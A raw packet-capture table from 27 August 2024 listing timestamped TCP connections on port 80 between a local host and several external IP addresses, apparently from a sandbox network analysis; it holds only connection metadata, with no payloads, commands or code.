Aug 27, 2024 17:50:19.533207893 CEST	80	49859	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:24.438867092 CEST	49860	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:24.623631954 CEST	80	49860	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:24.623819113 CEST	49860	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:24.631759882 CEST	49860	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:24.810733080 CEST	80	49860	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:24.823091030 CEST	80	49860	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:24.823203087 CEST	80	49860	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:24.823314905 CEST	80	49860	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:24.823328018 CEST	80	49860	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:24.823339939 CEST	80	49860	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:24.823364973 CEST	49860	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:24.823390961 CEST	80	49860	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:24.823535919 CEST	80	49860	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:24.823594093 CEST	49860	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:24.823661089 CEST	80	49860	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:24.823683977 CEST	80	49860	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:24.823698997 CEST	80	49860	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:24.823862076 CEST	49860	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:25.002897978 CEST	80	49860	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:25.002989054 CEST	80	49860	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:25.003022909 CEST	80	49860	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:25.003200054 CEST	49860	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:26.139350891 CEST	49860	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:27.156955004 CEST	49861	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:27.324085951 CEST	80	49861	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:27.324275017 CEST	49861	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:27.332182884 CEST	49861	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:27.497416019 CEST	80	49861	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:27.506719112 CEST	80	49861	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:27.508965015 CEST	80	49861	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:27.509056091 CEST	80	49861	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:27.509068966 CEST	80	49861	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:27.509088993 CEST	49861	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:27.509206057 CEST	49861	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:27.509306908 CEST	80	49861	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:27.509334087 CEST	80	49861	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:27.509387016 CEST	80	49861	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:27.509433031 CEST	80	49861	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:27.509517908 CEST	49861	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:27.509568930 CEST	49861	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:27.510519981 CEST	80	49861	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:27.510658026 CEST	80	49861	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:27.510881901 CEST	49861	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:27.674124002 CEST	80	49861	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:27.674187899 CEST	80	49861	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:27.674216032 CEST	80	49861	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:27.674348116 CEST	49861	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:28.841845989 CEST	49861	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:29.859493971 CEST	49862	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:30.027268887 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.027458906 CEST	49862	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:30.036597967 CEST	49862	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:30.036673069 CEST	49862	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:30.207321882 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.207426071 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.207492113 CEST	49862	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:30.207511902 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.207577944 CEST	49862	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:30.207601070 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.207642078 CEST	49862	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:30.207676888 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.207756042 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.207845926 CEST	49862	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:30.208039999 CEST	49862	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:30.373598099 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.373740911 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.373752117 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.373867035 CEST	49862	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:30.373887062 CEST	49862	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:30.373965025 CEST	49862	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:30.374138117 CEST	49862	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:30.374188900 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.374267101 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.374413013 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.374641895 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.374732018 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.374865055 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.375037909 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.375300884 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.539587021 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.539649010 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.539823055 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.540327072 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.566690922 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.566778898 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.566903114 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.566952944 CEST	49862	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:30.567051888 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.567105055 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.567150116 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.567280054 CEST	49862	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:30.567420959 CEST	49862	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:30.567622900 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.567724943 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.567876101 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.567903042 CEST	49862	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:30.567918062 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.568109989 CEST	49862	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:30.732273102 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.732296944 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.732311964 CEST	80	49862	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:30.732440948 CEST	49862	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:31.544413090 CEST	49862	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:32.562058926 CEST	49863	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:32.729610920 CEST	80	49863	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:32.729799986 CEST	49863	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:32.735111952 CEST	49863	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:32.902247906 CEST	80	49863	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:32.911341906 CEST	80	49863	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:32.911415100 CEST	80	49863	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:32.911467075 CEST	80	49863	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:32.911570072 CEST	80	49863	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:32.911691904 CEST	49863	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:32.911737919 CEST	80	49863	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:32.911751032 CEST	80	49863	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:32.911808968 CEST	49863	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:32.911881924 CEST	80	49863	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:32.911897898 CEST	80	49863	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:32.911952972 CEST	49863	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:32.912069082 CEST	49863	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:32.912084103 CEST	80	49863	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:32.912097931 CEST	80	49863	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:32.912251949 CEST	49863	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:33.078614950 CEST	80	49863	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:33.078640938 CEST	80	49863	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:33.078669071 CEST	80	49863	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:33.078875065 CEST	49863	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:33.082319975 CEST	49863	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:50:33.248994112 CEST	80	49863	203.161.42.73	192.168.11.20
Aug 27, 2024 17:50:38.092081070 CEST	49864	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:38.399972916 CEST	80	49864	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:38.400177002 CEST	49864	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:38.408102989 CEST	49864	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:38.716123104 CEST	80	49864	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:38.716283083 CEST	80	49864	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:38.716309071 CEST	80	49864	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:38.716430902 CEST	49864	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:39.917526960 CEST	49864	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:40.935127974 CEST	49865	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:41.257920027 CEST	80	49865	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:41.258049965 CEST	49865	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:41.266011953 CEST	49865	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:41.589070082 CEST	80	49865	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:41.589143991 CEST	80	49865	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:41.589154959 CEST	80	49865	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:41.589298964 CEST	49865	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:42.776319027 CEST	49865	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:43.795787096 CEST	49866	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:44.118519068 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:44.118673086 CEST	49866	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:44.127801895 CEST	49866	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:44.127852917 CEST	49866	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:44.127901077 CEST	49866	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:44.450602055 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:44.450731993 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:44.450788021 CEST	49866	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:44.450828075 CEST	49866	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:44.450841904 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:44.450930119 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:44.451117039 CEST	49866	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:44.451215029 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:44.451292038 CEST	49866	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:44.451565027 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:44.451628923 CEST	49866	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:44.451967001 CEST	49866	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:44.452136040 CEST	49866	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:44.773896933 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:44.774015903 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:44.774113894 CEST	49866	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:44.774137020 CEST	49866	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:44.774219036 CEST	49866	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:44.774235964 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:44.774357080 CEST	49866	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:44.774548054 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:44.774549007 CEST	49866	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:44.774719000 CEST	49866	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:44.774811029 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:44.774972916 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:44.775213957 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:44.775707960 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:44.775907993 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:45.097249031 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:45.097421885 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:45.097697020 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:45.097841024 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:45.098156929 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:45.098275900 CEST	80	49866	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:45.098393917 CEST	49866	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:45.635045052 CEST	49866	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:46.652698040 CEST	49867	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:46.954178095 CEST	80	49867	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:46.954410076 CEST	49867	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:46.959758997 CEST	49867	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:47.261209965 CEST	80	49867	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:47.261290073 CEST	80	49867	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:47.261379957 CEST	80	49867	38.47.207.120	192.168.11.20
Aug 27, 2024 17:50:47.261723042 CEST	49867	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:47.263765097 CEST	49867	80	192.168.11.20	38.47.207.120
Aug 27, 2024 17:50:47.565088987 CEST	80	49867	38.47.207.120	192.168.11.20
Aug 27, 2024 17:51:00.477773905 CEST	49868	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:00.708738089 CEST	80	49868	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:00.708925962 CEST	49868	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:00.716893911 CEST	49868	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:00.947870016 CEST	80	49868	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:00.948698997 CEST	80	49868	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:00.948796034 CEST	80	49868	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:00.948842049 CEST	80	49868	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:00.948911905 CEST	80	49868	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:00.948919058 CEST	49868	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:00.949079037 CEST	49868	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:02.225116968 CEST	49868	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:03.242690086 CEST	49869	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:03.467078924 CEST	80	49869	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:03.467241049 CEST	49869	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:03.475140095 CEST	49869	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:03.699486971 CEST	80	49869	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:03.700158119 CEST	80	49869	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:03.700210094 CEST	80	49869	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:03.700278997 CEST	80	49869	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:03.700378895 CEST	80	49869	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:03.700383902 CEST	49869	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:03.700484037 CEST	49869	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:04.990081072 CEST	49869	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:06.007736921 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:06.231650114 CEST	80	49870	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:06.231904984 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:06.241034031 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:06.465544939 CEST	80	49870	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:06.465646029 CEST	80	49870	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:06.465759993 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:06.465806007 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:06.465842962 CEST	80	49870	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:06.465926886 CEST	80	49870	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:06.466023922 CEST	80	49870	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:06.466181993 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:06.466200113 CEST	80	49870	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:06.466402054 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:06.466448069 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:06.689742088 CEST	80	49870	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:06.689901114 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:06.689949036 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:06.690515041 CEST	80	49870	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:06.690771103 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:06.690819979 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:06.731821060 CEST	80	49870	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:06.731969118 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:06.914216042 CEST	80	49870	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:06.914395094 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:06.914417028 CEST	80	49870	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:06.914438963 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:06.914828062 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:06.995647907 CEST	80	49870	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:06.995796919 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:07.138286114 CEST	80	49870	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:07.138402939 CEST	80	49870	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:07.138536930 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:07.138585091 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:07.264254093 CEST	80	49870	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:07.264394045 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:07.362226963 CEST	80	49870	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:07.362457037 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:07.362505913 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:07.427865982 CEST	80	49870	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:07.428138018 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:07.586134911 CEST	80	49870	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:07.586278915 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:07.586328030 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:07.755094051 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:07.803740025 CEST	80	49870	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:07.803963900 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:07.810040951 CEST	80	49870	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:07.810216904 CEST	49870	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:08.772746086 CEST	49871	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:08.999644995 CEST	80	49871	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:08.999854088 CEST	49871	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:09.005251884 CEST	49871	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:09.231957912 CEST	80	49871	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:09.232232094 CEST	80	49871	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:09.232717991 CEST	80	49871	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:09.232826948 CEST	80	49871	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:09.232934952 CEST	49871	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:09.233078957 CEST	80	49871	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:09.233311892 CEST	49871	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:09.233829021 CEST	80	49871	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:09.233947992 CEST	80	49871	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:09.234066010 CEST	80	49871	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:09.234162092 CEST	80	49871	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:09.234164000 CEST	49871	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:09.234173059 CEST	80	49871	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:09.234572887 CEST	49871	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:09.236613989 CEST	49871	80	192.168.11.20	194.58.112.174
Aug 27, 2024 17:51:09.463119030 CEST	80	49871	194.58.112.174	192.168.11.20
Aug 27, 2024 17:51:14.240377903 CEST	49872	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:15.253388882 CEST	49872	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:15.351061106 CEST	80	49872	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:15.351291895 CEST	49872	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:15.359217882 CEST	49872	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:15.456886053 CEST	80	49872	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:15.513927937 CEST	80	49872	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:15.514127970 CEST	80	49872	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:15.514251947 CEST	49872	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:16.862509966 CEST	49872	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:17.880096912 CEST	49873	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:17.977677107 CEST	80	49873	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:17.977837086 CEST	49873	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:17.985713005 CEST	49873	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:18.083244085 CEST	80	49873	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:18.154844046 CEST	80	49873	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:18.155132055 CEST	80	49873	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:18.155260086 CEST	49873	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:19.486963034 CEST	49873	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:20.504591942 CEST	49874	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:20.602349043 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.602484941 CEST	49874	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:20.611572027 CEST	49874	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:20.611654043 CEST	49874	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:20.709553003 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.709661961 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.709672928 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.709783077 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.709794998 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.709819078 CEST	49874	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:20.709904909 CEST	49874	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:20.709908009 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.709916115 CEST	49874	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:20.710025072 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.710110903 CEST	49874	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:20.710171938 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.710184097 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.710247040 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.710278034 CEST	49874	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:20.710448980 CEST	49874	80	192.168.11.20	35.244.245.121
